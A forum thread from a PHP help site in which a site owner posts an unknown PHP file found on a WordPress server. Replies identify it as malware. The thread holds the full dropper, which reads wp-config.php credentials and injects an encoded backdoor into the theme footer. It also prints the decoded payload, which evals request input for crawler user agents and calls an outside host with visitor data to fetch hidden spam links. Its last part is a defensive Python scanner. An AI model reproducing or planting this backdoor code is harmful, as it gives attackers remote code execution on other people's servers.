vivisick Posted April 30, 2009

I was wondering if anyone can tell me what this file is. I found it on my web server randomly one day. I don't know much about php, so this seemed like the place to get some help. Here is the code:

    <?
    $BASE_DIR = getcwd()."/";
    $frame = '<?eval(base64_decode("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"));?>'; //";
    $filename = $BASE_DIR."wp-config.php";

    function my_fread($filename) {
        if (@function_exists('file_get_contents')) {
            $content = file_get_contents($filename);
        } else {
            $handle = @fopen ($filename, "r");
            $content = @fread ($handle, @filesize ($filename));
            @fclose ($handle);
        }
        return $content;
    }

    function my_exit($message) {
        @unlink("iiousioduoisfdufiousd.php");
        echo "|||".$message;
        exit;
    }

    // ============== get template =======================
    require($filename);
    $mysqlcon = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD) or die(mysql_error());
    mysql_select_db(DB_NAME);
    echo mysql_error();
    $res = mysql_query("SELECT option_value FROM ".$table_prefix."options WHERE option_name = 'template'") or die(mysql_error());
    $row = mysql_fetch_array($res);
    $template = $row[0];
    if ($template == "") my_exit("no template");
    // ============== end of get template =======================

    // ============== rewrite template =======================
    $template_file = $BASE_DIR."wp-content/themes/".$template."/footer.php";
    echo "Got: $template_file\n";
    $content = my_fread($template_file);
    $pos = strpos($content, '<u style="display: none">');
    if ($pos !== false) my_exit("already have links");
    if (strstr($content,"</body>"))
        $content = str_replace("</body>",$frame."\n</body>",$content);
    else if (strstr($content,"</BODY>"))
        $content = str_replace("</BODY>",$frame."\n</BODY>",$content);
    else
        $content .= "\n".$frame;
    if (!$handle = @fopen($template_file, 'w')) my_exit("can't open template for writing");
    if (!@fwrite($handle, $content)) my_exit("can't write to template");
    @fclose($handle);
    my_exit("done");

Link to comment: https://forums.phpfreaks.com/topic/156327-solved-random-php-file-found-in-web-directory/

Kieran Menor Posted April 30, 2009

The base64 encoded part at the top yields:

    <?php
    if(stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") || stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")) {
        if(isset($_REQUEST["mmmakowoiwow001"])) {
            echo "Execution...\n";
            eval($_REQUEST["mmmakowoiwow001"]);
        }
        $url_unique_name = "http://colbyatontario.com/links/".rand(0,250).".txt?ip=".$_SERVER["REMOTE_ADDR"]."&host=".rawurlencode($_SERVER["HTTP_HOST"])."&agent=".rawurlencode($_SERVER["HTTP_USER_AGENT"]);
        if(function_exists("curl_init")) {
            $ch_unique_name = @curl_init();
            @curl_setopt($ch_unique_name, CURLOPT_URL, $url_unique_name);
            @curl_setopt($ch_unique_name, CURLOPT_RETURNTRANSFER, 1);
            @curl_setopt($ch_unique_name, CURLOPT_TIMEOUT, 30);
            @curl_setopt($ch_unique_name, CURLOPT_ENCODING , "gzip");
            $result_unique_name = @curl_exec($ch_unique_name);
            @curl_close($ch_unique_name);
            echo $result_unique_name;
        } else {
            $result_unique_name = @file_get_contents($url_unique_name);
            echo $result_unique_name;
        }
    }
    ?>

It basically lets someone run code on your server.

gffg4574fghsDSGDGKJYM Posted April 30, 2009

Obviously you've been hacked. It's hard to tell exactly how it happened without the full configuration/log and file. My best guess is a security flaw inside WordPress, since this PHP uses WordPress items to spam your website.

I haven't read it all and it's obfuscated code, but it seems to do 2 main things:

1- Get statistics from your visitors and send them to http://colbyatontario.com/
2- Read a file from http://colbyatontario.com/ that contains hidden backlinks and display them on many pages, if not all, in your website/WordPress blog.

The backlink file looks like this:

    <u style="display: none">
    <A href="http://www.fameb.ufba.br/ead/user/view.php?id=3383&course=1">Download Free Full Hentai Movies</A>
    <A href="http://www.fameb.ufba.br/ead/user/view.php?id=3386&course=1">Aquamarine If Jewelry Real Tell Vintage</A>
    <A href="http://www.fameb.ufba.br/ead/user/view.php?id=3387&course=1">Chip Thong Bikinis</A>
    <A href="http://www.fameb.ufba.br/ead/user/view.php?id=3390&course=1">Asian Porn Movie Post</A>
    <A href="http://www.fameb.ufba.br/ead/user/view.php?id=3396&course=1">Hot Celeb Sex Videos</A>
    ....

Its primary goal is probably to hack many WordPress websites with that and get tons of backlinks to cheat search engines into getting a high rank for other websites.

You will have to update your WordPress to the latest version and check frequently to be sure you haven't been hacked again. Maybe upgrade the apache/php/mysql versions to the latest too, with all security patches, or ask your host to do it. Always back up your data.

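An added example, not code from the thread or its posters: a static check in Python for the footer injection discussed above. It decodes the base64 wrapper without executing it and flags the traits of the payload shown in the second post; the function names, trait labels and sample footer are constructed for illustration.

```python
import base64
import re
from pathlib import Path

# Wrapper the dropper writes before </body>: <?eval(base64_decode("..."));?>
WRAPPER = re.compile(
    rb'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']', re.I)
# Traits of the decoded payload shown in the thread (labels are hypothetical).
PAYLOAD_TRAITS = {
    "eval-of-request-input": re.compile(rb'eval\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)', re.I),
    "user-agent-cloaking": re.compile(rb'HTTP_USER_AGENT.{0,40}(googlebot|yahoo)', re.I | re.S),
    "remote-fetch": re.compile(rb'curl_init|file_get_contents\s*\(\s*\$', re.I),
}
# Marker the dropper itself looks for in footer.php before injecting.
HIDDEN_LINKS = re.compile(rb'<u\s+style\s*=\s*["\']display:\s*none["\']', re.I)

# Constructed sample: a short stand-in with the same shape as the real payload.
SAMPLE_PAYLOAD = b'<?php if(stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")) { eval($_REQUEST["x"]); } ?>'
SAMPLE_FOOTER = (b'<div id="footer"></div>\n<?eval(base64_decode("'
                 + base64.b64encode(SAMPLE_PAYLOAD) + b'"));?>\n</body>')

def inspect_php(data: bytes) -> list[str]:
    """Return findings for one file's bytes. Payloads are decoded, never run."""
    findings = []
    for match in WRAPPER.finditer(data):
        findings.append("eval-base64-wrapper")
        try:
            decoded = base64.b64decode(match.group(1))
        except ValueError:  # bad padding or corrupt blob
            findings.append("undecodable-payload")
            continue
        findings += [name for name, rx in PAYLOAD_TRAITS.items() if rx.search(decoded)]
    if HIDDEN_LINKS.search(data):
        findings.append("hidden-link-block")
    return findings

def scan_themes(wp_root: str) -> dict[str, list[str]]:
    """Scan every PHP file under wp-content/themes and report flagged files."""
    report = {}
    for path in sorted(Path(wp_root, "wp-content", "themes").rglob("*.php")):
        findings = inspect_php(path.read_bytes())
        if findings:
            report[str(path)] = findings
    return report

if __name__ == "__main__":
    print(inspect_php(SAMPLE_FOOTER))
```

Running `scan_themes` from a scheduled job against the WordPress root covers the "check frequently" advice for this particular injection; it does not detect other modifications.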
vivisick (Author) Posted April 30, 2009

Thank you for the information. I will let my host know at once. You have been very helpful.

This topic is now archived and is closed to further replies.